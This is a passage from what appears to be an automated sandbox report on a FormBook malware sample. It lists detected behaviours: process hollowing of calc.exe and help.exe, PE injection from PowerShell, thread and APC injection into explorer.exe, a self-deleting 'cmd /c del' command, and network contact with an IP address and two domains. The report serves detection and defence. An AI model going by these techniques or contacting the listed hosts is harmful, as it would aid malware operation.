Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h] 19_2_02A89100
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h] 19_2_02A89100
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h] 19_2_02A89100
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8C962 mov eax, dword ptr fs:[00000030h] 19_2_02A8C962
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h] 19_2_02A8B171
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h] 19_2_02A8B171
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h] 19_2_02AAC577
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h] 19_2_02AAC577
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h] 19_2_02AAB944
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h] 19_2_02AAB944
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC3D43 mov eax, dword ptr fs:[00000030h] 19_2_02AC3D43
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B03540 mov eax, dword ptr fs:[00000030h] 19_2_02B03540
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA7D50 mov eax, dword ptr fs:[00000030h] 19_2_02AA7D50
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\calc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe Code function: 1_2_00401180 Sleep,Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,Sleep,exit, 1_2_00401180

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.130 80
Source: C:\Windows\explorer.exe Domain query: www.strawberrylinebikehire.com
Source: C:\Windows\explorer.exe Domain query: www.rajuherbalandspicegarden.com
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\calc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\calc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\calc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\calc.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\calc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\calc.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 1F0000
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 2BC5008
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: explorer.exe, 0000000A.00000000.304127753.00000000089FF000.00000004.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000A.00000000.315976236.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY